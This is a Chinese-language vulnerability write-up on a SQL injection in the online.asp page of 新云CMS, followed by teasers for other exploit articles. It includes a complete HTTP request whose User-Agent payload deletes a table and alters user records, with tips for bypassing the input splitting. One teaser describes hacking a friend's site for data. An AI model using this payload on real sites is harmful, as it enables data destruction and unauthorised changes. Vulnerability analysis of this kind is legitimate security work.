新云CMS Online.asp页面过滤不严导致SQL注入漏洞
所属分类:
网络安全 / 漏洞分析
阅读数:
194
收藏 0赞 0分享
受影响系统:
最新版本
漏洞文件:
/inc/online.asp
代码分析如下:
OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strReferer) VALUES (" & UserSessionID & "," & cid & ",'" & strUsername & "','" & stridentitys & "','" & CurrentStation & "','" & remoteaddr & "','" & BrowserType.platform&"|"&BrowserType.Browser&BrowserType.version & "|"&BrowserType.AlexaToolbar&"'," & NowString & "," & NowString & "," & userid & ",'" & strReferer & "')" //第69行
。。。。。。
Agent = Request.ServerVariables("HTTP_USER_AGENT") //第99行
。。。。。。
ElseIf Left(Agent, 5) = "Opera" Then '有此标识为浏览器 //第162行
Agent = Split(Agent, "/")
Browser = "Mozilla "
Tmpstr = Split(Agent(1), " ")
version = Tmpstr(0)
HTTP_USER_AGENT我们可以控制,则version变量我们就可以控制了。
构造数据包如下:
POST /inc/online.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/xx.htm
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Opera/haha',2008,2009,11111,'');delete from NC_Online;update[NC_User]set[buycode]=7;--
Host: localhost
Connection: Keep-Alive
Cookie: ASPSESSIONIDAABBCRRS=FFGNDBDDKJLFADOGOMKLBGPF
成功执行sql语句
注意的地方:
1. 在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用/**/和空格,上面是使用tab键弄出来的空格。
2. 一定要加上delete from NC_Online,不然下次程序就不执行insert语句,而改成执行update语句了。
遨游已经修复的三个安全漏洞分析
在80sec通知遨游存在的安全漏洞之后,遨游于6.30号发布了新版的浏览器,修复了前面提到的安全漏洞,具体更新可以见http://blog.maxthon.cn/,此次更新修复了三个安全问题,主要的问题细节如下:
漏洞来源:http://www.80sec.com/relea
收藏 0赞 0分享
Z-blog跨站脚本攻击漏洞
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带
收藏 0赞 0分享
世界之窗等浏览器本地xss跨域漏洞POC
漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.
收藏 0赞 0分享
FoosunCMS Sql Injection Vulnerability
--== =================== www.nspcn.org ================= ==--
--== FoosunCMS (API_Response.asp) Remote SQL Injection Exploit ==--
--==
收藏 0赞 0分享
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件自身设计造成的XSS漏洞所暴发的威力有多么大!
通过类似的漏洞我测试了一个功能十足的浏览器木马,这个“
收藏 0赞 0分享
PHPCMS2.4中一个有趣的洞洞
今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看
打开一看发现是phpcms2.4,很旧的版本了~~
搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧
挖了1个多小时,发现vote.php中有这样一段代码
收藏 0赞 0分享
Microsoft Visual Interdev 文件缓冲区溢出漏洞
受影响系统:
Microsoft Visual InterDev 6.0 (SP6)
描述:
Visual InterDev是微软为程序员设计的网页开发工具。
Visual InterDev在处理畸形格式的SLN文件时存在漏洞,远程攻击者可能利用此漏洞
收藏 0赞 0分享
查看更多